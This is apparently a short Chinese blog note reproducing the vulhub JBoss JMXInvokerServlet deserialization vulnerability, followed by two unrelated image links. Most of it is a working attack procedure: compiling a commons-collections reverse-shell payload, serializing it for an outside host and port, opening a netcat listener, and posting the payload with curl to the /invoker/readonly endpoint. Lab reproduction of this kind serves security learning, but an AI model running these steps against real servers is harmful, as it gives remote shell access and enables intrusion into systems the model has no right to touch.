vulhub/jboss/JMXInvokerServlet-deserialization
1.
此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。访问若提示下载
JMXInvokerServlet,则可能存在漏洞:
#创建class⽂件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHa
shMap.java
#创建反序列化⽂件
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 123.57.211.129:6666
#监听 6666 端⼝
nc -lvvp 6666
#psot提交
curl http://123.57.211.129:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
2.
![re题(38)BUUCTF-[FlareOn6]Overlong](https://i-blog.csdnimg.cn/direct/9b47ac03866f4faab77c654e413bf047.png)
![[杂谈-黑神话:悟空] 中国3A游戏的崛起之路:挑战与机遇并存](https://i-blog.csdnimg.cn/direct/c104221bfccb453cb08511cd11472cce.png)